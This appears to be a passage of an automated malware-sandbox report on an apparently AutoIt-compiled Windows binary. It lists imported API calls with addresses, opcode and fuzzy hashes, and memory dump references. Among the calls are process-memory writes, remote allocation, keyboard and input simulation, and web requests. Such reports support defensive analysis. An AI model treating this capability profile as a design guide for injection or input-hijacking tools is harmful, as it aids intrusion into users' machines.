                  • Part of subcall function 004370BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0043713C
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043714C
                  • Part of subcall function 004370BF: BeginPath.GDI32(?), ref: 00437161
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043718A
                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004373E8
                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004373F8
                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 00437433
                • LineTo.GDI32(?,?,FFFFFFFE), ref: 0043743C
                • CloseFigure.GDI32(?), ref: 00437443
                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 00437452
                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0043746E
                Similarity
                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                • String ID:
                • API String ID: 4082120231-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetParent.USER32(?), ref: 00434518
                • GetKeyboardState.USER32(?), ref: 0043452D
                • SetKeyboardState.USER32(?), ref: 00434581
                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004345AE
                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004345CC
                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00434615
                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00434637
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _memset.LIBCMT ref: 00447BEE
                • _memset.LIBCMT ref: 00447C9A
                • ShellExecuteExW.SHELL32(0000003C), ref: 00447CDE
                  • Part of subcall function 003FF260: _wcslen.LIBCMT ref: 003FF262
                  • Part of subcall function 003FF260: _wcscpy.LIBCMT ref: 003FF282
                • CloseHandle.KERNEL32(?), ref: 00447D80
                Strings
                Similarity
                • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                • String ID: <$@
                • API String ID: 1325244542-1426351568
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00430D3F
                • GetWindowLongW.USER32(?,000000F0), ref: 00430D81
                • GetWindowLongW.USER32(?,000000F0), ref: 00430DC1
                • SendMessageW.USER32(01271B88,000000F1,00000000,00000000), ref: 00430DF5
                • SendMessageW.USER32(01271B88,000000F1,00000001,00000000), ref: 00430E21
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Similarity
                • API ID: Menu$Item$DrawInfoInsert_memset
                • String ID: 0
                • API String ID: 3866635326-4108050209
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _strlen.LIBCMT ref: 003FF548
                  • Part of subcall function 003FF700: _memset.LIBCMT ref: 003FF708
                  • Part of subcall function 003FF570: _memmove.LIBCMT ref: 003FF5B9
                  • Part of subcall function 003FF570: _memmove.LIBCMT ref: 003FF5D3
                • _memset.LIBCMT ref: 003FF663
                • _memset.LIBCMT ref: 003FF66D
                • _memset.LIBCMT ref: 003FF67A
                • _sprintf.LIBCMT ref: 003FF69E
                Strings
                Similarity
                • API ID: _memset$_memmove$_sprintf_strlen
                • String ID: %02X
                • API String ID: 1823384282-436463671
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00440B5D
                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00440B6E
                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00440B7C
                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00440B8D
                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00440B9B
                Strings
                Similarity
                • API ID: MessageSend
                • String ID: Msctls_Progress32
                • API String ID: 3850602802-3636473452
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00426AD7: GetProcessHeap.KERNEL32(00000008,0000000C,00426C03), ref: 00426ADB
                  • Part of subcall function 00426AD7: HeapAlloc.KERNEL32(00000000), ref: 00426AE2
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00426C12
                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00426C1B
                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00426C24
                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00426C30
                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00426C39
                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426C3C
                • CreateThread.KERNEL32 ref: 00426C54
                Similarity
                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                • String ID:
                • API String ID: 1957940570-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: Rect$Client$Window$MetricsScreenSystem
                • String ID:
                • API String ID: 3220332590-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetKeyboardState.USER32(?), ref: 0043C4E6
                • SetKeyboardState.USER32(00000080), ref: 0043C50A
                • PostMessageW.USER32(?,00000100,?,?), ref: 0043C54B
                • PostMessageW.USER32(?,00000104,?,?), ref: 0043C583
                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0043C5A5
                • SendInput.USER32(00000001,?,0000001C), ref: 0043C638
                Similarity
                • API ID: MessagePost$KeyboardState$InputSend
                • String ID:
                • API String ID: 2221674350-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: _wcscpy$_wcscat
                • String ID:
                • API String ID: 2037614760-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,?,00000000), ref: 00441B16
                • VariantCopy.OLEAUT32(?,?), ref: 00441B6E
                • VariantCopy.OLEAUT32(-00000068,?), ref: 00441B84
                • VariantCopy.OLEAUT32(-00000088,?), ref: 00441B9D
                • VariantClear.OLEAUT32(-00000058), ref: 00441C17
                • SysAllocString.OLEAUT32(00000000), ref: 00441C30
                Similarity
                • API ID: Variant$Copy$AllocClearErrorLastString
                • String ID:
                • API String ID: 960795272-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • BeginPaint.USER32(00000000,?), ref: 00437B03
                • GetWindowRect.USER32 ref: 00437B81
                • ScreenToClient.USER32 ref: 00437B9F
                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00437BB2
                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00437BF9
                • EndPaint.USER32(?,?), ref: 00437C37
                Similarity
                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                • String ID:
                • API String ID: 4189319755-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ShowWindow.USER32(?,00000000), ref: 00430A11
                • EnableWindow.USER32(?,00000000), ref: 00430A36
                • ShowWindow.USER32(?,00000000), ref: 00430A9F
                • ShowWindow.USER32(?,00000004), ref: 00430AB2
                • EnableWindow.USER32(?,00000001), ref: 00430AD7
                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00430AFC
                Similarity
                • API ID: Window$Show$Enable$MessageSend
                • String ID:
                • API String ID: 642888154-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 003FF260: _wcslen.LIBCMT ref: 003FF262
                  • Part of subcall function 003FF260: _wcscpy.LIBCMT ref: 003FF282
                • _wcslen.LIBCMT ref: 004337D1
                • _wcslen.LIBCMT ref: 004337EA
                • _wcstok.LIBCMT ref: 004337FC
                • _wcslen.LIBCMT ref: 00433810
                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0043381E
                • _wcstok.LIBCMT ref: 00433835
                Similarity
                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                • String ID:
                • API String ID: 3632110297-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00498178), ref: 0042319E
                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00498178), ref: 004231B9
                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,00498178), ref: 004231C3
                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00498178), ref: 004231CB
                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,00498178), ref: 004231D5
                Similarity
                • API ID: PerformanceQuery$CounterSleep$Frequency
                • String ID:
                • API String ID: 2833360925-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 004370BF: DeleteObject.GDI32(00000000), ref: 004370FC
                  • Part of subcall function 004370BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0043713C
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043714C
                  • Part of subcall function 004370BF: BeginPath.GDI32(?), ref: 00437161
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043718A
                • MoveToEx.GDI32(?,?,?,00000000), ref: 004371C4
                • LineTo.GDI32(?,?,?), ref: 004371D0
                • MoveToEx.GDI32(?,?,?,00000000), ref: 004371DE
                • LineTo.GDI32(?,?,?), ref: 004371EA
                • EndPath.GDI32(?), ref: 004371FA
                • StrokePath.GDI32(?), ref: 00437208
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp
                Similarity
                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                • String ID:
                • API String ID: 372113273-0
                • Opcode ID: fd1852cb25d5ba7338afb2eaa7deadcbbf9fa49a918ba75d1762b8c2a238330a
                • Instruction ID: 35a4bf74de757b75a4806015e753d65524dda7bc5f249f775fd160a14c1f29cd
                • Opcode Fuzzy Hash: fd1852cb25d5ba7338afb2eaa7deadcbbf9fa49a918ba75d1762b8c2a238330a
                • Instruction Fuzzy Hash: B101FC72001214BBE3219B44EC8CFDB7B2CEF4A300F000129FA05A628187B42A80CBBD
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetDC.USER32(00000000), ref: 0043CBE3
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0043CBEE
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043CBFA
                • ReleaseDC.USER32 ref: 0043CC06
                • MulDiv.KERNEL32(000009EC,?,?), ref: 0043CC1E
                • MulDiv.KERNEL32(000009EC,?,?), ref: 0043CC2F
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: cdb2b83760f2388f49e626a376dc30ce95897b33f6274b66ea3a4ad2d59933ea
                • Instruction ID: a5a86c71256f9fba23cde4a01fb56b50f352bf675524776cf44d0f195d3d8e33
                • Opcode Fuzzy Hash: cdb2b83760f2388f49e626a376dc30ce95897b33f6274b66ea3a4ad2d59933ea
                • Instruction Fuzzy Hash: E60112B5640214BFE7109F95DD85F5A7B6CFF58761F00801AFF0CDB240D6B499408BA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003FF048
                • MapVirtualKeyW.USER32(00000010,00000000), ref: 003FF050
                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003FF05B
                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003FF066
                • MapVirtualKeyW.USER32(00000011,00000000), ref: 003FF06E
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FF076
                Similarity
                • API ID: Virtual
                • String ID:
                • API String ID: 4278518827-0
                • Opcode ID: 15dc91798de6962dac49bf7154a189f69828fe3dc311675b26c67457101feed6
                • Instruction ID: c03ee99189ceef3c37337f22543ded0de5c3a50d7349ee6ee6d84e0c85219d2d
                • Opcode Fuzzy Hash: 15dc91798de6962dac49bf7154a189f69828fe3dc311675b26c67457101feed6
                • Instruction Fuzzy Hash: 84016770106B88ADD3309F668C84B43FEF8EF95704F01491DD1D907A52C6B5A84CCB69
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedExchange.KERNEL32(?,?), ref: 0043B5E1
                • EnterCriticalSection.KERNEL32(?), ref: 0043B5F2
                • TerminateThread.KERNEL32(?,000001F6), ref: 0043B600
                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0043B60E
                  • Part of subcall function 004225E5: CloseHandle.KERNEL32(00000000,00000000,?,0043B61A,00000000,?,000003E8,?,000001F6), ref: 004225F3
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0043B623
                • LeaveCriticalSection.KERNEL32(?), ref: 0043B62A
                Similarity
                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                • String ID:
                • API String ID: 3495660284-0
                • Opcode ID: 0ec22fa43ee8cc4efd2a4a4c54b4ae891d853eb67a701963627949b66988e0e1
                • Instruction ID: 571f33fb77593ce97826c07fc1f6e7e631b195fc7faed99a747609ab8e86f91b
                • Opcode Fuzzy Hash: 0ec22fa43ee8cc4efd2a4a4c54b4ae891d853eb67a701963627949b66988e0e1
                • Instruction Fuzzy Hash: 86F0AF72241201BBC200AF60EE89DABB77CFF48311F400526F60982562CBB4E491CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _memset.LIBCMT ref: 0044FA20
                • GetMenuItemInfoW.USER32 ref: 0044FA3B
                • DeleteMenu.USER32(?,?,00000000), ref: 0044FA8C
                • DeleteMenu.USER32(00000000,?,00000000), ref: 0044FADF
                Strings
                Similarity
                • API ID: Menu$Delete$InfoItem_memset
                • String ID: 0
                • API String ID: 1173514356-4108050209
                • Opcode ID: 1b8c7b1fda26eea1c7e3a368694ddc5ca3273dd487a5d864e67b846d47f275aa
                • Instruction ID: 8bad6f450b1605514415abdfd5bae63879cf28041bb12f65d6eab7b1465796f7
                • Opcode Fuzzy Hash: 1b8c7b1fda26eea1c7e3a368694ddc5ca3273dd487a5d864e67b846d47f275aa
                • Instruction Fuzzy Hash: 6E419371604341ABE310DF25D844B5BB7A8FF85324F14862EF9A8AB2C1D374E8458BA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Similarity
                • API ID: Handle
                • String ID: nul
                • API String ID: 2519475695-2873401336
                • Opcode ID: e74780f305c83a65659aef61974e90d813f14df7e0a264ddbdb0d222f3e9d819
                • Instruction ID: 5dcbfcb2504c5127bdea7449568c049957596e300f91128adf00ba83c669e05e
                • Opcode Fuzzy Hash: e74780f305c83a65659aef61974e90d813f14df7e0a264ddbdb0d222f3e9d819
                • Instruction Fuzzy Hash: AD31C531600208ABD720DF68EC45BAB77A8EF08321F10864AFD54D73D1EBB5D950CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 00433281
                Strings
                Similarity
                • API ID: Handle
                • String ID: nul
                • API String ID: 2519475695-2873401336
                • Opcode ID: 6f50c5f68fc4b7c46f82abd4b9bea8ba078af7e367ff1d0f4427a58f0b3eb885
                • Instruction ID: e5d0ff15207cb455b505c0e7dbe24ae0665dbe5d70043bddb552653b0740abc1
                • Opcode Fuzzy Hash: 6f50c5f68fc4b7c46f82abd4b9bea8ba078af7e367ff1d0f4427a58f0b3eb885
                • Instruction Fuzzy Hash: E3217331600204ABD7209F68DC45FABB7A8EF19331F10879AFDA4973D0DBB59A90C795
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Similarity
                • API ID:
                • String ID: SysAnimate32
                • API String ID: 0-1011021900
                • Opcode ID: ee0dbf1a3d9d9cc43cbbb36bc52d7ceaf1ef8d9a1738516ed75a90dfb8bbdc5b
                • Instruction ID: b0f1e44ba4683f2cec0800db3ef748e8370ff1d2ce0d6199a24bf4a605e4b653
                • Opcode Fuzzy Hash: ee0dbf1a3d9d9cc43cbbb36bc52d7ceaf1ef8d9a1738516ed75a90dfb8bbdc5b
                • Instruction Fuzzy Hash: AB21A771200204ABEB249E69DC95FAB73DCEB99724F20671BF514D72C0C678EC818B68
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetKeyboardState.USER32(?), ref: 0043C348
                • SetKeyboardState.USER32(00000080), ref: 0043C36C
                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0043C3B0
                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0043C3E8
                • SendInput.USER32(00000001,?,0000001C), ref: 0043C475
                Similarity
                • API ID: KeyboardMessagePostState$InputSend
                • String ID:
                • API String ID: 3031425849-0
                • Opcode ID: d0f0a8fe47854248642a8e47684977a0ddf2ab4eb756056504c13448a7abbc4d
                • Instruction ID: 257e538e0befd20575bd579f0673be2d026053f971001a29ad50e7cc34d7dcf7
                • Opcode Fuzzy Hash: d0f0a8fe47854248642a8e47684977a0ddf2ab4eb756056504c13448a7abbc4d
                • Instruction Fuzzy Hash: 82418D315002586ADB10DFA9ECC5BFF7B68EF8A310F40D05BFD9866242C37D99558BA8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCursorPos.USER32(?), ref: 0044631D
                • ScreenToClient.USER32 ref: 0044633A
                • GetAsyncKeyState.USER32(?), ref: 00446377
                • GetAsyncKeyState.USER32(?), ref: 00446387
                • GetWindowLongW.USER32(?,000000F0), ref: 004463DD
                Similarity
                • API ID: AsyncState$ClientCursorLongScreenWindow
                • String ID:
                • API String ID: 3539004672-0
                • Opcode ID: 4366f1e751dd7a04a59f8c20e96d91df5d854e262261bb726e66054d9043c9d6
                • Instruction ID: 270bd74a82b582f24254f63f6edf28bf5273a459a0a89570a7ba79b05a7ff329
                • Opcode Fuzzy Hash: 4366f1e751dd7a04a59f8c20e96d91df5d854e262261bb726e66054d9043c9d6
                • Instruction Fuzzy Hash: 23413074504214BBEB24CF65C884DEBB7B9EF46324F10465EF86593290C634A980DB69
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00431C30
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00431C64
                • RegCloseKey.ADVAPI32(?), ref: 00431C85
                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00431CC7
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00431CF5
                Similarity
                • API ID: Enum$CloseDeleteOpen
                • String ID:
                • API String ID: 2095303065-0
                • Opcode ID: da9c104c1b06a5f7c5841e68c90d75afbdf3008f35f5785dd2736d0e5a1bfc87
                • Instruction ID: 1193b0a33ecda91fd5ff616139bc729272621a760a8f8d176cd52fa17ab37bf0
                • Opcode Fuzzy Hash: da9c104c1b06a5f7c5841e68c90d75afbdf3008f35f5785dd2736d0e5a1bfc87
                • Instruction Fuzzy Hash: 39319CB2900118BEDB10DBD4EC85EFEB3BCEB49304F14456AF605A7141E678AE848BB4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: RectWindow
                • String ID:
                • API String ID: 861336768-0
                • Opcode ID: 81973a8663a9d13ab2c73cc3a776946c5b5e06a30275a821bb826eae084b0397
                • Instruction ID: 103c1f9ac63b4998edad80ec7faf42453def21e776f4dc6950162e450a6f0efb
                • Opcode Fuzzy Hash: 81973a8663a9d13ab2c73cc3a776946c5b5e06a30275a821bb826eae084b0397
                • Instruction Fuzzy Hash: B131AA7270021D9FDB00CF68D989AAE7BA5EB45324F518226FD14E7381D774ED51CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCursorPos.USER32(?), ref: 00437806
                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 00437820
                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 00437841
                • GetCursorPos.USER32(00000000), ref: 0043788E
                • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 004378B5
                Similarity
                • API ID: CursorMenuPopupTrack$Proc
                • String ID:
                • API String ID: 1300944170-0
                • Opcode ID: db19de0eaa32503e9ed99d95b20d534e72d96d9d4de13803aec05c98a85ce9b7
                • Instruction ID: 76685b34b27013b1841d7c042fe8795982cd04dd4f21e67e69693ec108ed8046
                • Opcode Fuzzy Hash: db19de0eaa32503e9ed99d95b20d534e72d96d9d4de13803aec05c98a85ce9b7
                • Instruction Fuzzy Hash: B231C475600108AFDB24DF58DC88FAB7769EB8D311F10416AF6488B391DB756C52CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: Client$CursorFromPointProcRectScreenWindow
                • String ID:
                • API String ID: 1822080540-0
                • Opcode ID: 06086d3111e9c2d30ba0e98c164fe549f88e4685525d9b31ab137a8c5a6d9eb2
                • Instruction ID: a635363f16cb0b1134031011c6e16c186eb814290897058e6ffbc52c7169b56b
                • Opcode Fuzzy Hash: 06086d3111e9c2d30ba0e98c164fe549f88e4685525d9b31ab137a8c5a6d9eb2
                • Instruction Fuzzy Hash: 09316CB12042019FD720DF19D884A6B77A4FFC9314F144A2EF8948B291D774EC96CBAA
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62d03e5c9d41714caff77268b5251c68e99245e9b43894d391b5fb730a034f19
                • Instruction ID: f961b59ce5c6f33761b4dcac1ff0fb5b3e272ac3e8b6b6309e1281a980d8f703
                • Opcode Fuzzy Hash: 62d03e5c9d41714caff77268b5251c68e99245e9b43894d391b5fb730a034f19
                • Instruction Fuzzy Hash: 7921BD752006019BDB20EF69D9C4C6B77A8EF89320B00466AFE4587396DB34EC45CBB9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsWindowVisible.USER32 ref: 0043577F
                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00435799
                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004357D3
                • _wcslen.LIBCMT ref: 00435801
                • CharUpperBuffW.USER32(00000000,00000000), ref: 0043580B
                Similarity
                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                • String ID:
                • API String ID: 3087257052-0
                • Opcode ID: 92d1e24577e558a04f08f0bb69a015e24bab56dfb06ff6fd928dc01307aff1f6
                • Instruction ID: da6b0d98e744ae519cfafca94315f16b7e6fb0b4c3e35d85cde79e62dd18c46f
                • Opcode Fuzzy Hash: 92d1e24577e558a04f08f0bb69a015e24bab56dfb06ff6fd928dc01307aff1f6
                • Instruction Fuzzy Hash: 67110A7260054177E7109B65DC46F5BB78CAF65360F04803AF809E7780EB79F94583A9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DeleteObject.GDI32(00000000), ref: 004370FC
                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0043713C
                • SelectObject.GDI32(?,00000000), ref: 0043714C
                • BeginPath.GDI32(?), ref: 00437161
                • SelectObject.GDI32(?,00000000), ref: 0043718A
                Similarity
                • API ID: Object$Select$BeginCreateDeletePath
                • String ID:
                • API String ID: 2338827641-0
                • Opcode ID: e6532d6f426f90810e4069e16e10a8348652a773ad4c4ea5518e15d5226bfcaa
                • Instruction ID: c14b4600aeb7f94cb32968877b7643b7868304d8f2f128594d75b220a8650c09
                • Opcode Fuzzy Hash: e6532d6f426f90810e4069e16e10a8348652a773ad4c4ea5518e15d5226bfcaa
                • Instruction Fuzzy Hash: 9E2171B28052559BCB20CF6DAD48A9E7BACE71A310F10417BF954D73A1D7749C80CBAD
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _malloc.LIBCMT ref: 0040F627
                  • Part of subcall function 004034DB: __FF_MSGBANNER.LIBCMT ref: 004034F4
                  • Part of subcall function 004034DB: __NMSG_WRITE.LIBCMT ref: 004034FB
                  • Part of subcall function 004034DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00406A35,?,00000001,?,?,00408179,00000018,0047D180,0000000C,00408209), ref: 00403520
                • _free.LIBCMT ref: 0040F63A
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNEL32(00000000), ref: 0042457F
                • QueryPerformanceCounter.KERNEL32(?), ref: 0042459C
                • Sleep.KERNEL32(00000000), ref: 004245BB
                • QueryPerformanceCounter.KERNEL32(?), ref: 004245C5
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: CounterPerformanceQuerySleep
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Path$ObjectStroke$DeleteFillSelect
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __getptd.LIBCMT ref: 00407732
                  • Part of subcall function 0040798C: __getptd_noexit.LIBCMT ref: 0040798F
                  • Part of subcall function 0040798C: __amsg_exit.LIBCMT ref: 0040799C
                • __getptd.LIBCMT ref: 00407749
                • __amsg_exit.LIBCMT ref: 00407757
                • __lock.LIBCMT ref: 00407767
                • __updatetlocinfoEx_nolock.LIBCMT ref: 0040777B
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00424300: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00424331
                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00426579
                  • Part of subcall function 004242C4: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 004242F5
                  • Part of subcall function 00424394: GetWindowThreadProcessId.USER32(?,?), ref: 004243C7
                  • Part of subcall function 00424394: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004243D8
                  • Part of subcall function 00424394: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 004243EF
                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004265E9
                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00426669
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                • String ID: @
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0043A7BE
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0043A80D
                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0043A845
                  • Part of subcall function 00432252: GetLastError.KERNEL32 ref: 00432268
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                • String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004407D5
                • GetWindowLongW.USER32(?,000000F0), ref: 004407F3
                • SetWindowLongW.USER32 ref: 00440804
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Window$Long
                • String ID: SysTreeView32
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(?), ref: 00424B1E
                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00424B96
                • FreeLibrary.KERNEL32(?), ref: 00424BAD
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: AU3_GetPluginDetails
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00440D73
                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00440D8C
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00440DB4
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: MessageSend$Window
                • String ID: SysMonthCal32
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DestroyWindow.USER32(00000000), ref: 004409A5
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: DestroyWindow
                • String ID: msctls_updown32
